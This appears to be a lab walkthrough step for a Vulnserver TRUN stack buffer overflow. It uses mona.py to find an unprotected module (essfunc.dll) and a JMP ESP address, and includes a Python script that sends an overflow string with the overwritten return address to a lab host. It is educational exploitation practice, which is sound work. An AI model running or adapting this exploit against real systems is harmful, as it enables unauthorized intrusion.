Finding RIGHT Module

PRACTICE ! PRACTICE ! PRACTICE !

Finding the apt module refers to finding some kind of dll's within the program which has NO MEMORY PROTECTIONS such as DEP - ASLR - SAFE SEH etc

Do download the mona.py and place it in the Debugger PyCommand's location

To interact with the mona module we'll have to use the command

!mona modules

• So there is a module called essfunc.dll whose memory protections are all set to FALSE

• Now the last thing to do is find an opcode equivalent to JMP - To do that !

$ /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm> JMP ESP
FFE4

• So now lets use the mona module to find the assembly opcode FFE4 by using the command

!mona find -s "\xff\xe4" -m essfunc.dll

Let's try out the first RET address, which is 0x625011af

Now let's write our python script automate this

#!/usr/bin/python

import sys, socket

shellcode = "A" * 2003 + "\xaf\x11\x50\x62"	# Writing this in reverse because of the x86 arch little endian mapping

try:
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect(('192.168.0.104',9999))

	s.send(('TRUN /.:/' + shellcode))
	s.close()

except:

	print("Error !")
	sys.exit()

• Before executing the script make sure to set a breakpoint on the JMP code (625011af)

F2 will set a breakpoint to the JMP code, now let's run the script !